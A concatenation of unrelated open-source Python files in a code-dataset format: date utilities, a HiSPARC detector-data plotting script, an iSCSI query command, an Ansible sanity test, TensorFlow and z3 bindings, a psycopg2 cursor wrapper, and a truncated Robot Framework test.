for format in (None, '%x %X', '%X %x', '%Y-%M-%dT%h:%m:%sZ'):
try:
return time.strptime(datetime_string, format)
except ValueError:
pass
raise ValueError("It is not possible to guess the datetime format of %s" % datetime_string)
def get_time_estimator(total):
"""
Given a total amount of items to compute, return a function that,
if called every time an item is computed (or every step items are computed)
will give a time estimation for how long it will take to compute the whole
set of itmes. The function will return two values: the first is the
number of seconds that are still needed to compute the whole set, the second
value is the time in the future when the operation is expected to end.
"""
t1 = time.time()
count = [0]
def estimate_needed_time(step=1):
count[0] += step
t2 = time.time()
t3 = 1.0 * (t2 - t1) / count[0] * (total - count[0])
return t3, t3 + t1
return estimate_needed_time
# This library does not support strftime's "%s" or "%y" format strings.
# Allowed if there's an even number of "%"s because they are escaped.
_illegal_formatting = re.compile(r"((^|[^%])(%%)*%[sy])")
def _findall(text, substr):
# Also finds overlaps
sites = []
i = 0
while 1:
j = text.find(substr, i)
if j == -1:
break
sites.append(j)
i=j+1
return sites
def strftime(fmt, dt):
if not isinstance(dt, real_date):
dt = datetime(dt[0], dt[1], dt[2], dt[3], dt[4], dt[5])
if dt.year >= 1900:
return time.strftime(fmt, dt.timetuple())
illegal_formatting = _illegal_formatting.search(fmt)
if illegal_formatting:
raise TypeError("strftime of dates before 1900 does not handle" + illegal_formatting.group(0))
year = dt.year
# For every non-leap year century, advance by
# 6 years to get into the 28-year repeat cycle
delta = 2000 - year
off = 6 * (delta // 100 + delta // 400)
year = year + off
# Move to around the year 2000
year = year + ((2000 - year) // 28) * 28
timetuple = dt.timetuple()
s1 = time.strftime(fmt, (year,) + timetuple[1:])
sites1 = _findall(s1, str(year))
s2 = time.strftime(fmt, (year+28,) + timetuple[1:])
sites2 = _findall(s2, str(year+28))
sites = []
for site in sites1:
if site in sites2:
sites.append(site)
s = s1
syear = "%04d" % (dt.year,)
for site in sites:
s = s[:site] + syear + s[site+4:]
return s
def get_dst(date_obj):
"""Determine if dst is locally enabled at this time"""
dst = 0
if date_obj.year >= 1900:
tmp_date = time.mktime(date_obj.timetuple())
# DST is 1 so reduce time with 1 hour.
dst = time.localtime(tmp_date)[-1]
return dst
def utc_to_localtime(date_str, fmt="%Y-%m-%d %H:%M:%S", input_fmt="%Y-%m-%dT%H:%M:%SZ"):
"""
Convert UTC to localtime
Reference:
- (1) http://www.openarchives.org/OAI/openarchivesprotocol.html#Dates
- (2) http://www.w3.org/TR/NOTE-datetime
This function works only with dates complying with the
"Complete date plus hours, minutes and seconds" profile of
ISO 8601 defined by (2), and linked from (1).
Eg: 1994-11-05T13:15:30Z
"""
date_struct = datetime.strptime(date_str, input_fmt)
date_struct += timedelta(hours=get_dst(date_struct))
date_struct -= timedelta(seconds=time.timezone)
return strftime(fmt, date_struct)
def localtime_to_utc(date_str, fmt="%Y-%m-%dT%H:%M:%SZ", input_fmt="%Y-%m-%d %H:%M:%S"):
"""Convert localtime to UTC"""
date_struct = datetime.strptime(date_str, input_fmt)
date_struct -= timedelta(hours=get_dst(date_struct))
date_struct += timedelta(seconds=time.timezone)
return strftime(fmt, date_struct)
def strptime(date_string, fmt):
return real_datetime(*(time.strptime(date_string, fmt)[:6]))
| gpl-2.0 |
laurensstoop/HiSPARC-BONZ | egg/legacy/egg_saskia_v4.2.py | 1 | 9204 | # -*- coding: utf-8 -*-
#
#################################################################################################
# #
# Program for analysing HiSPARC data #
# #
# This software is made under the GNU General Public License, version 3 (GPL-3.0) #
# #
#################################################################################################
"""
===================================
Created on Thu Mar 24 13:17:57 2016
@author: Laurens Stoop
===================================
"""
################################## HEADER ##################################
"""
Import of Packages
"""
import sapphire # The HiSparc Python Framework
import tables # A HDF5 python module that allows to store data
import datetime # A package to decode the timeformat of HiSparc data
import matplotlib.pyplot as plt # Plotting functionality of MatPlotLib
import numpy as np # This is NumPy
import os.path # To check if files exist (so you don't do stuff again)
import rootpy.plotting # Get the pythonesc version of ROOT
from rootpy.plotting import root2matplotlib
from matplotlib.colors import LogNorm
"""
Getting the data file and setting the variables
"""
# Time between which the data is downloaded (jjjj,mm,dd,[hh])
START = datetime.datetime(2015,01,01)
END = datetime.datetime(2016,01,01)
# Give the list of stations
STATIONS = [501,503,1006,1101,3001,13002,14001,20003]
# Do not show the figures
plt.ioff()
################################## BODY ##################################
"""
Data acquisition
"""
# Open a data file (automatic close)
with tables.open_file('egg_saskia.h5','a') as data_file:
# Retrieve for every station the data and plot a pulsehisto
for station in STATIONS:
# Set the station name (this is the group name in the file)
station_name = '/s%d' %station
# Data is downloaded
if station_name not in data_file:
# Let them know what we do
print "\nGetting event data from station %d " % station
# Now retrieve the event data
sapphire.esd.download_data(
data_file, # File (as opened above)
station_name, # Group name (/s..station..)
station, # Station number
START, # Start data date
END, # End data date
'events', # Download events (or 'weather')
True) # Show progress
# Let them know what we do
print "\nGetting wheater data from station %d " % station
# Now retrieve the wheater data
sapphire.esd.download_data(
data_file, # File (as opened above)
station_name, # Group name (/s..station..)
station, # Station number
START, # Start data date
END, # End data date
'weather', # Download wheater
True) # Show progress
# If the datafile has the group we do not download them data
else:
print "All data present for station %d" % station
####### Pulseheight histograms #######
# If the plot exist we skip the plotting
if os.path.isfile('pulseheigt_histogram_%d.pdf' % station):
# Say if the plot is present
print "Plot already present for station %d" % station
# If there is no plot we make it
else:
# Get event data
event_data = data_file.get_node(
station_name, # From the group (/s..station..)
'events') # Get the node with events
# Set the figure
figure_pulse = plt.figure(station)
# Get the pulseheight from all events
data_pulseheight = event_data.col('pulseheights') # col takes all data from events
# Creates bins so that the ugly shit is taken away
bins = np.linspace(0, 4500, 201)
# Plotting the pulseheigth for all events
plt.hist(
data_pulseheight, # Plot the Pulseheight
bins, # Number of bins
histtype='step', # Make the histogram a step function
log=True) # With a logarithmic scale
# Setting the plot labels and title
plt.xlabel("Pulseheight [ADC]")
plt.ylabel("Counts")
plt.title("Pulseheight histogram (log scale) for station (%d)" %station)
# Saving them Pica
plt.savefig(
'pulseheigt_histogram_%d.pdf' % station, # Name of the file
bbox_inches='tight') # Use less whitespace
# Necessary to avoid multiplotting in one figure and to close memory leak
plt.close(figure_pulse)
####### Pulseheight vs pulse integral histograms #######
# If the plot exist we skip the plotting
if os.path.isfile('pmt_saturation_s%d.pdf' %station):
# Say if the plot is present
print "PMT saturation histogram already present for station %d" % station
# If there is no plot we make it
else:
# Get event data
event_data = data_file.get_node(
station_name, # From the group (/s..station..)
'events') # Get the node with events
# Get the pulseheight from all events
data_pulseheights = event_data.col('pulseheights') # col takes all data from events (this improves the speed)
# Get the integral from all events
data_integrals = event_data.col('integrals') # col takes all data from events
# Make a figure so it can be closed
figure_combo, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex = 'col', sharey = 'row')
# Setting the plot titles
ax1.set_title('Detector 1')
ax2.set_title('Detector 2')
ax3.set_title('Detector 3')
ax4.set_title('Detector 4')
# Setting the plot labels
ax1.set_ylabel('Pulseheight [ADC]')
ax3.set_ylabel('Pulseheight [ADC]')
ax3.set_xlabel('Pulse integral [ADC.ns]')
ax4.set_xlabel('Pulse integral [ADC.ns]')
# Now we plot the data of every detector
for detector in range(0,4):
# Select the detector data
data_pulseheight_detector = data_pulseheights[:,detector]
data_integral_detector = data_integrals[:,detector]
# Combine the detector data
data_combo = np.stack(
(data_integral_detector, # The pulse integral on y axis
data_pulseheight_detector), # The pulseheight on x axis
axis=-1) # To get the direction correct
# Initiate a 2D histogram (ROOT style)
histogram_combo_detector = rootpy.plotting.Hist2D(100, 0, 150000, 100, 0, 4500)
# Fill the Histogram
histogram_combo_detector.fill_array(data_combo)
# Plot the histogram with logarithmic colors in correct place
if detector == 0:
root2matplotlib.hist2d(histogram_combo_detector, norm=LogNorm(), axes=ax1)
elif detector == 1:
root2matplotlib.hist2d(histogram_combo_detector, norm=LogNorm(), axes=ax2)
elif detector == 2:
root2matplotlib.hist2d(histogram_combo_detector, norm=LogNorm(), axes=ax3)
elif detector == 3:
root2matplotlib.hist2d(histogram_combo_detector, norm=LogNorm(), axes=ax4)
# Save the file
figure_combo.savefig(
'pmt_saturation_s%d.pdf' %station) # Name of the file
# Close the figure
plt.close(figure_combo)
# Now we go to the next detector
detector +1
print "####### I'm Done Bitches! #######"
################################## FOOTER ##################################
"""
Clean up shit
"""
| gpl-3.0 |
karesansui/karesansui | bin/get_iscsi.py | 1 | 5464 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of Karesansui.
#
# Copyright (C) 2012 HDE, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import os
import sys
import re
import logging
from optparse import OptionParser
from ksscommand import KssCommand, KssCommandException, KssCommandOptException
import __cmd__
try:
import karesansui
from karesansui import __version__
from karesansui.lib.utils import load_locale, execute_command
from karesansui.lib.iscsi import iscsi_parse_node, iscsi_parse_session, iscsi_print_format_node, \
iscsi_check_node_status, iscsi_check_node_autostart, iscsi_get_auth_type, iscsi_get_auth_user
from karesansui.lib.const import ISCSI_CMD, ISCSI_CMD_OPTION_MODE, \
ISCSI_CMD_OPTION_MODE_NODE, ISCSI_CMD_OPTION_MODE_SESSION, ISCSI_CMD_RES_NO_NODE, \
ISCSI_CMD_RES_NO_ACTIVE_SESSION
except ImportError, e:
print >>sys.stderr, "[Error] some packages not found. - %s" % e
sys.exit(1)
_ = load_locale()
usage = '%prog [options]'
def getopts():
optp = OptionParser(usage=usage, version=__version__)
optp.add_option('-i', '--iqn', dest='iqn', help=_('IQN'), default=None)
return optp.parse_args()
def chkopts(opts):
reg = re.compile("[^a-zA-Z0-9\._:-]")
if opts.iqn:
if reg.search(opts.iqn):
raise KssCommandOptException('ERROR: Illigal option value. option=%s value=%s' % ('-i or --iqn', opts.iqn))
class GetIscsi(KssCommand):
def process(self):
(opts, args) = getopts()
chkopts(opts)
self.up_progress(10)
node_command_args = (ISCSI_CMD,
ISCSI_CMD_OPTION_MODE,
ISCSI_CMD_OPTION_MODE_NODE
)
(node_rc, node_res) = execute_command(node_command_args)
if node_rc != 0:
for node_line in node_res:
if node_line.lower().find(ISCSI_CMD_RES_NO_NODE) != -1:
self.logger.info("iSCSI node not found")
return True
raise KssCommandException('Failed to get iSCSI node. message=%s' % (node_res))
self.up_progress(20)
session_command_args = (ISCSI_CMD,
ISCSI_CMD_OPTION_MODE,
ISCSI_CMD_OPTION_MODE_SESSION
)
(session_rc, session_res) = execute_command(session_command_args)
if session_rc != 0:
raise KssCommandException('Failed to get iSCSI session. message=%s' % (session_res))
self.up_progress(20)
for node_line in node_res:
if not node_line:
continue
try:
node = iscsi_parse_node(node_line)
except:
self.logger.warn('Failed to parse iSCSI node command response. message="%s"' % (node_line))
continue
is_active = 0
for session_line in session_res:
if not session_line:
continue
if session_line.find(ISCSI_CMD_RES_NO_ACTIVE_SESSION) != -1:
break
try:
session = iscsi_parse_session(session_line)
except:
self.logger.warn('Failed to parse iSCSI session command response. message="%s"' % (session_line))
continue
if iscsi_check_node_status(node, session):
is_active = 1
break
if iscsi_check_node_autostart(node):
autostart = 0
else:
autostart = 1
if opts.iqn is None:
self.logger.info("%s %s %s" % (iscsi_print_format_node(node), is_active, autostart))
print >>sys.stdout, _("%s %s %s") % (iscsi_print_format_node(node), is_active, autostart)
else:
if opts.iqn == node['iqn']:
auth = iscsi_get_auth_type(node)
user = iscsi_get_auth_user(node)
self.logger.info("%s %s %s %s %s" % (iscsi_print_format_node(node), is_active, autostart, auth, user))
print >>sys.stdout, _("%s %s %s %s %s") % (iscsi_print_format_node(node), is_active, autostart, auth, user)
break
return True
if __name__ == "__main__":
target = GetIscsi()
sys.exit(target.run())
| mit |
felixfontein/ansible | test/lib/ansible_test/_internal/commands/sanity/import.py | 13 | 9115 | """Sanity test for proper import exception handling."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ... import types as t
from . import (
SanityMultipleVersion,
SanityMessage,
SanityFailure,
SanitySuccess,
SanitySkipped,
SANITY_ROOT,
)
from ...target import (
TestTarget,
)
from ...util import (
ANSIBLE_TEST_DATA_ROOT,
SubprocessError,
remove_tree,
display,
parse_to_list_of_dict,
is_subdir,
generate_pip_command,
find_python,
get_hash,
REMOTE_ONLY_PYTHON_VERSIONS,
)
from ...util_common import (
intercept_command,
run_command,
ResultType,
)
from ...ansible_util import (
ansible_environment,
)
from ...executor import (
generate_pip_install,
install_cryptography,
)
from ...config import (
SanityConfig,
)
from ...coverage_util import (
coverage_context,
)
from ...venv import (
create_virtual_environment,
)
from ...data import (
data_context,
)
def _get_module_test(module_restrictions): # type: (bool) -> t.Callable[[str], bool]
"""Create a predicate which tests whether a path can be used by modules or not."""
module_path = data_context().content.module_path
module_utils_path = data_context().content.module_utils_path
if module_restrictions:
return lambda path: is_subdir(path, module_path) or is_subdir(path, module_utils_path)
return lambda path: not (is_subdir(path, module_path) or is_subdir(path, module_utils_path))
class ImportTest(SanityMultipleVersion):
"""Sanity test for proper import exception handling."""
def filter_targets(self, targets): # type: (t.List[TestTarget]) -> t.List[TestTarget]
"""Return the given list of test targets, filtered to include only those relevant for the test."""
return [target for target in targets if os.path.splitext(target.path)[1] == '.py' and
any(is_subdir(target.path, path) for path in data_context().content.plugin_paths.values())]
def test(self, args, targets, python_version):
"""
:type args: SanityConfig
:type targets: SanityTargets
:type python_version: str
:rtype: TestResult
"""
settings = self.load_processor(args, python_version)
paths = [target.path for target in targets.include]
capture_pip = args.verbosity < 2
python = find_python(python_version)
if python_version.startswith('2.') and args.requirements:
# hack to make sure that virtualenv is available under Python 2.x
# on Python 3.x we can use the built-in venv
pip = generate_pip_command(python)
run_command(args, generate_pip_install(pip, '', packages=['virtualenv']), capture=capture_pip)
env = ansible_environment(args, color=False)
temp_root = os.path.join(ResultType.TMP.path, 'sanity', 'import')
messages = []
for import_type, test, add_ansible_requirements in (
('module', _get_module_test(True), False),
('plugin', _get_module_test(False), True),
):
if import_type == 'plugin' and python_version in REMOTE_ONLY_PYTHON_VERSIONS:
continue
data = '\n'.join([path for path in paths if test(path)])
if not data:
continue
requirements_file = None
# create a clean virtual environment to minimize the available imports beyond the python standard library
virtual_environment_dirname = 'minimal-py%s' % python_version.replace('.', '')
if add_ansible_requirements:
requirements_file = os.path.join(ANSIBLE_TEST_DATA_ROOT, 'requirements', 'sanity.import-plugins.txt')
virtual_environment_dirname += '-requirements-%s' % get_hash(requirements_file)
virtual_environment_path = os.path.join(temp_root, virtual_environment_dirname)
virtual_environment_bin = os.path.join(virtual_environment_path, 'bin')
remove_tree(virtual_environment_path)
if not create_virtual_environment(args, python_version, virtual_environment_path):
display.warning("Skipping sanity test '%s' on Python %s due to missing virtual environment support." % (self.name, python_version))
return SanitySkipped(self.name, python_version)
# add the importer to our virtual environment so it can be accessed through the coverage injector
importer_path = os.path.join(virtual_environment_bin, 'importer.py')
yaml_to_json_path = os.path.join(virtual_environment_bin, 'yaml_to_json.py')
if not args.explain:
os.symlink(os.path.abspath(os.path.join(SANITY_ROOT, 'import', 'importer.py')), importer_path)
os.symlink(os.path.abspath(os.path.join(SANITY_ROOT, 'import', 'yaml_to_json.py')), yaml_to_json_path)
# activate the virtual environment
env['PATH'] = '%s:%s' % (virtual_environment_bin, env['PATH'])
env.update(
SANITY_TEMP_PATH=ResultType.TMP.path,
SANITY_IMPORTER_TYPE=import_type,
)
if data_context().content.collection:
env.update(
SANITY_COLLECTION_FULL_NAME=data_context().content.collection.full_name,
SANITY_EXTERNAL_PYTHON=python,
)
virtualenv_python = os.path.join(virtual_environment_bin, 'python')
virtualenv_pip = generate_pip_command(virtualenv_python)
# make sure requirements are installed if needed
if requirements_file:
install_cryptography(args, virtualenv_python, python_version, virtualenv_pip)
run_command(args, generate_pip_install(virtualenv_pip, 'sanity', context='import-plugins'), env=env, capture=capture_pip)
# make sure coverage is available in the virtual environment if needed
if args.coverage:
run_command(args, generate_pip_install(virtualenv_pip, '', packages=['setuptools']), env=env, capture=capture_pip)
run_command(args, generate_pip_install(virtualenv_pip, '', packages=['coverage']), env=env, capture=capture_pip)
try:
# In some environments pkg_resources is installed as a separate pip package which needs to be removed.
# For example, using Python 3.8 on Ubuntu 18.04 a virtualenv is created with only pip and setuptools.
# However, a venv is created with an additional pkg-resources package which is independent of setuptools.
# Making sure pkg-resources is removed preserves the import test consistency between venv and virtualenv.
# Additionally, in the above example, the pyparsing package vendored with pkg-resources is out-of-date and generates deprecation warnings.
# Thus it is important to remove pkg-resources to prevent system installed packages from generating deprecation warnings.
run_command(args, virtualenv_pip + ['uninstall', '--disable-pip-version-check', '-y', 'pkg-resources'], env=env, capture=capture_pip)
except SubprocessError:
pass
run_command(args, virtualenv_pip + ['uninstall', '--disable-pip-version-check', '-y', 'setuptools'], env=env, capture=capture_pip)
run_command(args, virtualenv_pip + ['uninstall', '--disable-pip-version-check', '-y', 'pip'], env=env, capture=capture_pip)
display.info(import_type + ': ' + data, verbosity=4)
cmd = ['importer.py']
try:
with coverage_context(args):
stdout, stderr = intercept_command(args, cmd, self.name, env, capture=True, data=data, python_version=python_version,
virtualenv=virtualenv_python)
if stdout or stderr:
raise SubprocessError(cmd, stdout=stdout, stderr=stderr)
except SubprocessError as ex:
if ex.status != 10 or ex.stderr or not ex.stdout:
raise
pattern = r'^(?P<path>[^:]*):(?P<line>[0-9]+):(?P<column>[0-9]+): (?P<message>.*)$'
parsed = parse_to_list_of_dict(pattern, ex.stdout)
relative_temp_root = os.path.relpath(temp_root, data_context().content.root) + os.path.sep
messages += [SanityMessage(
message=r['message'],
path=os.path.relpath(r['path'], relative_temp_root) if r['path'].startswith(relative_temp_root) else r['path'],
line=int(r['line']),
column=int(r['column']),
) for r in parsed]
results = settings.process_errors(messages, paths)
if results:
return SanityFailure(self.name, messages=results, python_version=python_version)
return SanitySuccess(self.name, python_version=python_version)
| gpl-3.0 |
gunan/tensorflow | tensorflow/python/framework/op_def_registry.py | 16 | 1842 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Global registry for OpDefs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorflow.core.framework import op_def_pb2
from tensorflow.python import _op_def_registry
# The cache amortizes ProtoBuf serialization/deserialization overhead
# on the language boundary. If an OpDef has been looked up, its Python
# representation is cached.
_cache = {}
_cache_lock = threading.Lock()
def get(name):
"""Returns an OpDef for a given `name` or None if the lookup fails."""
try:
return _cache[name]
except KeyError:
pass
with _cache_lock:
try:
# Return if another thread has already populated the cache.
return _cache[name]
except KeyError:
pass
serialized_op_def = _op_def_registry.get(name)
if serialized_op_def is None:
return None
op_def = op_def_pb2.OpDef()
op_def.ParseFromString(serialized_op_def)
_cache[name] = op_def
return op_def
# TODO(b/141354889): Remove once there are no callers.
def sync():
"""No-op. Used to synchronize the contents of the Python registry with C++."""
| apache-2.0 |
gsrp/opengsrp | gsrp/services/cursor.py | 1 | 4564 | # --*-- coding: utf-8 --*--
import psycopg2
import psycopg2.extras
from psycopg2 import Error
from tools.translations import trlocal as _
class Cursor(object):
conn = None
cr = None
def _connect(self, dsn, database, user, password, host, port):
if self.conn:
if self.conn.closed:
self.conn = psycopg2.connect(dsn = self.dsn, database = self.database, user = self.user, password = self.password, host = self.host, port = self.port, connection_factory = psycopg2.extensions.connection)
else:
return True
else:
self.dsn = dsn
self.database = database
self.user = user
self.password = password
self.host = host
self.port = port
self.conn = psycopg2.connect(dsn = self.dsn, database = self.database, user = self.user, password = self.password,connection_factory = psycopg2.extensions.connection)
return True
def _cursor(self):
if self.conn:
if self.cr and not self.cr.closed:
return True
else:
#self.cr = self.conn.cursor(cursor_factory = psycopg2.extras.NamedTupleCursor)
self.cr = self.conn.cursor()
return True
else:
return False
def _checkLogin(self):
return self.conn and self.cr and not self.conn.closed and not self.cr.closed
def _setAutocommit(self, val = True):
if self.conn and not self.conn.closed and self.cr and not self.cr.closed:
self._isolation_level = self.conn.isolation_level
self.conn.set_isolation_level(0)
self._autocommit = self.conn.autocommit
if self.conn.autocommit != val:
self.conn.autocommit = val
def _restoreAutocommit(self):
if self.conn and not self.conn.closed and self.cr and not self.cr.closed:
if self.conn.autocommit != self._autocommit:
self.conn.set_isolation_level(self._isolation_level)
self.conn.autocommit = self._autocommit
def _mogrify(self, query, vars):
return self.cr.mogrify(query,vars)
def _execute(self, query, vars = None):
try:
self.cr.execute(query = query, vars = vars)
except:
self.cr.conn._rollback()
raise
def _executemany(self, query, vars_list):
self.cr.execute(query = query, vars_list = vars_list)
def _executeList(self, query_list):
try:
for q in query_list:
#print('TYPE',type(q),query_list)
if type(q) in (tuple,list):
query = q[0]
vars = q[1]
elif type(q) in (str,bytes):
query = q
vars = None
#for query, vars in query_list:
#print('QUERY VARS:',query,vars)
self.cr.execute(query = query, vars = vars)
except:
self.cr.conn._rollback()
raise
def _executemanyList(self, querymany_list):
for query, vars_list in querymany_list:
self.cr.execute(query = query, vars_list = vars_list)
def _commit(self):
if self.conn and not self.conn.closed:
self.conn.commit()
return True
else:
return False
def _rollback(self):
if self.conn and not self.conn.closed:
self.conn.rollback()
return True
else:
return False
def fetchone(self):
return self.cr.fetchone()
def dictfetchone(self):
record = {}
if self.cr.rowcount > 0:
row = self.cr.fetchone()
for i in range(self.cr.description.__len__()):
record[self.cr.description[i].name] = row[i]
return record
def fetchmany(self, size = None):
if not size:
size = self.cr.arraysize
return self.cr.fetchmany(size = size)
def dictfetchmany(self, size = None):
if not size:
size = self.cr.arraysize
records = []
if self.cr.rowcount > 0:
for row in self.cr.fetchmany(size=size):
record = {}
for i in range(self.cr.description.__len__()):
record[self.cr.description[i].name] = row[i]
records.append(record)
return records
def fetchall(self):
return self.cr.fetchall()
def dictfetchall(self):
records = []
if self.cr.rowcount > 0:
for row in self.cr.fetchmany(size=size):
record = {}
for i in range(self.cr.description.__len__()):
record[self.cr.description[i].name] = row[i]
records.append(record)
return records
def _login(self,dsn, database, user, password, host, port):
if self._checkLogin() or (self._connect(dsn = dsn, database = database, user = user, password = password, host = host, port = port) and self._cursor()):
return [True,_("You logged as %s") % (user,)]
else:
return [False, _("You a not logged. Invalid username or password")]
def _logout(self):
if self.cr and not self.cr.closed:
self.cr.close()
self.cr = None
if self.conn and not self.conn.closed:
self.conn.close()
self.conn = None
return [True, _("User %s is logout") % (self.user,)]
else:
return [False, _("You a not logged")]
| agpl-3.0 |
rychipman/858-labs | symex/z3py/z3types.py | 2 | 3379 | import ctypes, z3core
class Z3Exception(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class ContextObj(ctypes.c_void_p):
def __init__(self, context): self._as_parameter_ = context
def from_param(obj): return obj
class Config(ctypes.c_void_p):
def __init__(self, config): self._as_parameter_ = config
def from_param(obj): return obj
class Symbol(ctypes.c_void_p):
def __init__(self, symbol): self._as_parameter_ = symbol
def from_param(obj): return obj
class Sort(ctypes.c_void_p):
def __init__(self, sort): self._as_parameter_ = sort
def from_param(obj): return obj
class FuncDecl(ctypes.c_void_p):
def __init__(self, decl): self._as_parameter_ = decl
def from_param(obj): return obj
class Ast(ctypes.c_void_p):
def __init__(self, ast): self._as_parameter_ = ast
def from_param(obj): return obj
class Pattern(ctypes.c_void_p):
def __init__(self, pattern): self._as_parameter_ = pattern
def from_param(obj): return obj
class Model(ctypes.c_void_p):
def __init__(self, model): self._as_parameter_ = model
def from_param(obj): return obj
class Literals(ctypes.c_void_p):
def __init__(self, literals): self._as_parameter_ = literals
def from_param(obj): return obj
class Constructor(ctypes.c_void_p):
def __init__(self, constructor): self._as_parameter_ = constructor
def from_param(obj): return obj
class ConstructorList(ctypes.c_void_p):
def __init__(self, constructor_list): self._as_parameter_ = constructor_list
def from_param(obj): return obj
class GoalObj(ctypes.c_void_p):
def __init__(self, goal): self._as_parameter_ = goal
def from_param(obj): return obj
class TacticObj(ctypes.c_void_p):
def __init__(self, tactic): self._as_parameter_ = tactic
def from_param(obj): return obj
class ProbeObj(ctypes.c_void_p):
def __init__(self, probe): self._as_parameter_ = probe
def from_param(obj): return obj
class ApplyResultObj(ctypes.c_void_p):
def __init__(self, obj): self._as_parameter_ = obj
def from_param(obj): return obj
class StatsObj(ctypes.c_void_p):
def __init__(self, statistics): self._as_parameter_ = statistics
def from_param(obj): return obj
class SolverObj(ctypes.c_void_p):
def __init__(self, solver): self._as_parameter_ = solver
def from_param(obj): return obj
class FixedpointObj(ctypes.c_void_p):
def __init__(self, fixedpoint): self._as_parameter_ = fixedpoint
def from_param(obj): return obj
class ModelObj(ctypes.c_void_p):
def __init__(self, model): self._as_parameter_ = model
def from_param(obj): return obj
class AstVectorObj(ctypes.c_void_p):
def __init__(self, vector): self._as_parameter_ = vector
def from_param(obj): return obj
class AstMapObj(ctypes.c_void_p):
def __init__(self, ast_map): self._as_parameter_ = ast_map
def from_param(obj): return obj
class Params(ctypes.c_void_p):
def __init__(self, params): self._as_parameter_ = params
def from_param(obj): return obj
class ParamDescrs(ctypes.c_void_p):
def __init__(self, paramdescrs): self._as_parameter_ = paramdescrs
def from_param(obj): return obj
class FuncInterpObj(ctypes.c_void_p):
def __init__(self, f): self._as_parameter_ = f
def from_param(obj): return obj
class FuncEntryObj(ctypes.c_void_p):
def __init__(self, e): self._as_parameter_ = e
def from_param(obj): return obj
| mit |
alexandrul-ci/robotframework | utest/utils/test_unic.py | 3 | 7030 | import unittest
import re
from robot.utils import unic, prepr, DotDict, JYTHON, IRONPYTHON, PY2, PY3
from robot.utils.asserts import assert_equal, assert_true
if JYTHON:
from java.lang import String, Object, RuntimeException
import JavaObject
import UnicodeJavaLibrary
class TestJavaUnic(unittest.TestCase):
def test_with_java_object(self):
data = u'This is unicode \xe4\xf6'
assert_equal(unic(JavaObject(data)), data)
def test_with_class_type(self):
assert_true('java.lang.String' in unic(String('').getClass()))
def test_with_array_containing_unicode_objects(self):
assert_true('Circle is 360' in
unic(UnicodeJavaLibrary().javaObjectArray()))
def test_with_iterator(self):
iterator = UnicodeJavaLibrary().javaIterator()
assert_true('java.util' in unic(iterator))
assert_true('Circle is 360' in iterator.next())
def test_failure_in_toString(self):
class ToStringFails(Object, UnRepr):
def toString(self):
raise RuntimeException(self.error)
failing = ToStringFails()
assert_equal(unic(failing), failing.unrepr)
class TestUnic(unittest.TestCase):
if not (JYTHON or IRONPYTHON):
def test_unicode_nfc_and_nfd_decomposition_equality(self):
import unicodedata
text = u'Hyv\xe4'
assert_equal(unic(unicodedata.normalize('NFC', text)), text)
# In Mac filesystem umlaut characters are presented in NFD-format.
# This is to check that unic normalizes all strings to NFC
assert_equal(unic(unicodedata.normalize('NFD', text)), text)
def test_object_containing_unicode_repr(self):
assert_equal(unic(UnicodeRepr()), u'Hyv\xe4')
def test_list_with_objects_containing_unicode_repr(self):
objects = [UnicodeRepr(), UnicodeRepr()]
result = unic(objects)
if JYTHON:
# This is actually wrong behavior
assert_equal(result, '[Hyv\\xe4, Hyv\\xe4]')
elif IRONPYTHON or PY3:
# And so is this.
assert_equal(result, '[Hyv\xe4, Hyv\xe4]')
elif PY3:
assert_equal(result, '[Hyv\xe4, Hyv\xe4]')
else:
expected = UnRepr.format('list', 'UnicodeEncodeError: ')[:-1]
assert_true(result.startswith(expected))
def test_bytes_below_128(self):
assert_equal(unic('\x00-\x01-\x02-\x7f'), u'\x00-\x01-\x02-\x7f')
def test_bytes_above_128(self):
assert_equal(unic(b'hyv\xe4'), u'hyv\\xe4')
assert_equal(unic(b'\x00-\x01-\x02-\xe4'), u'\x00-\x01-\x02-\\xe4')
def test_bytes_with_newlines_tabs_etc(self):
assert_equal(unic(b"\x00\xe4\n\t\r\\'"), u"\x00\\xe4\n\t\r\\'")
def test_bytearray(self):
assert_equal(unic(bytearray(b'hyv\xe4')), u'hyv\\xe4')
assert_equal(unic(bytearray(b'\x00-\x01-\x02-\xe4')), u'\x00-\x01-\x02-\\xe4')
assert_equal(unic(bytearray(b"\x00\xe4\n\t\r\\'")), u"\x00\\xe4\n\t\r\\'")
def test_failure_in_unicode(self):
failing = UnicodeFails()
assert_equal(unic(failing), failing.unrepr)
def test_failure_in_str(self):
failing = StrFails()
assert_equal(unic(failing), failing.unrepr)
class TestPrettyRepr(unittest.TestCase):
def _verify(self, item, expected=None):
if not expected:
expected = repr(item)
assert_equal(prepr(item), expected)
def test_ascii_unicode(self):
self._verify(u'foo', "'foo'")
self._verify(u"f'o'o", "\"f'o'o\"")
def test_non_ascii_unicode(self):
